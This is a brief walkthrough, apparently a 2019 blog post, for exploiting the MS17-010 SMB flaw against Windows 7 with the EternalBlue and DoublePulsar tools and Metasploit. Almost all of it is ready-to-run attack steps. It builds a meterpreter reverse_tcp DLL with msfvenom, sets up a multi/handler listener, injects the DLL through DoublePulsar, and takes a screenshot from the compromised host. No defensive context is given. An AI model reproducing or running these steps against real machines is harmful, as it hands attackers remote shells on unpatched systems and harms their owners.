ms17010

Published 2019-04-14 20:28

Native payload on Windows

Run fb.py and answer the prompts: set the target IP, set the local (attacking machine) IP, answer "no" to the next prompt, and give the new project any name. Then check which vulnerabilities are usable against the target:

  fb > use Smbtouch

Generate the backdoor

  msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8089 -f dll > reverse.dll

msf listener (lhost/lport must match the LHOST/LPORT used in msfvenom above):

  msf > use exploit/multi/handler
  msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  msf exploit(multi/handler) > set lhost
  msf exploit(multi/handler) > set lport
  msf exploit(multi/handler) > run

Select the EternalBlue exploit

  fb Touch (Smbtouch) > use Eternalblue

For the target, choose option 1 (Win7).

  fb Special (Eternalblue) > use Doublepulsar

Choose option 2 (run DLL) and point it at the DLL generated above.

msf-windows.msi tool: link

Linux: payload ported to msf

Install wine32:

  dpkg --add-architecture i386 && apt-get install wine32

Clone the project into /root:

  git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Copy it into the Metasploit directory (usr/share), then load and run the module:

  msf > reload_all
  msf > use eternalblue_doublepulsar
  msf > set RHOST
  msf > run

If this errors out, run wine -h first.

Generate the backdoor:

  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll

Once the session comes back:

  meterpreter > screenshot   # take a screenshot